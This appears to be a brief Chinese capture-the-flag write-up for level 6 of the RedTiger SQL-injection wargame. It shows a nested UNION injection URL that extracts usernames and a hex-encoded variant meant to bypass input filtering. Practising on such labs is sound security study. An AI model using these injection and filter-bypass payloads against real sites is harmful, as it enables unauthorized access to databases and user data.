双重查询

http://redtiger.labs.overthewire.org/level6.php?user=-1
union select 1,-1' union select 1,2,3,username,5 from level6_users where status=1 #,3,4,5 #   

其中

-1' union select 1,2,3,username,5 from level6_users where status=1 #

可以换成16进制进行绕过,

即:

http://redtiger.labs.overthewire.org/level6.php?user=-0 union select 1,0x2d312720756e696f6e2073656c65637420312c322c332c757365726e616d652c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123,3,4,5 #